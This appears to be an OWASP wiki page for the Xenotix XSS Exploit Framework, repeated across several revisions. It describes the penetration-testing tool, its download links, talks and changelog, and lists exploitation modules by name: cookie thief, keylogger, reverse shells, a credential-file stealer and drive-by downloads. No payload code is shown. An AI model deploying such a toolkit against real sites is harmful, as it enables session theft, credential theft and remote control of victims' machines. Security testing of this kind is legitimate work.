VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-22T15:50:32Z

Ajin Abraham: aligning

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-22T15:40:02Z

Ajin Abraham: /* Documentation Added V6 Video Tutorial Series */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-19T05:28:34Z

Ajin Abraham: download link shorten

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
